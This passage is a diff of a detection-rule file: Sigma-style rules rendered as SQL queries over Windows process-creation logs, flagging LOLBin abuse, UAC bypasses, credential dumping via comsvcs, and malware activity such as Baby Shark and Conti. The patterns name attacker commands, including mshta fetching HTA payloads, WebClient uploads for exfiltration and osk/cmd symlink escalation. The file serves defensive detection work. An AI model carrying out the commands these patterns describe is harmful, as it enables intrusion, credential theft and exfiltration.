NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.collection", - "attack.t1123" + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Legitimate use of dnx.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "status": "test", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.g0020", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027.004" ], "falsepositives": [ - "Unlikely" + "Utilization of this tool should not be seen in enterprise environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Suspicious Execution of Taskkill", + "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_taskkill_execution.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "status": "experimental", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR 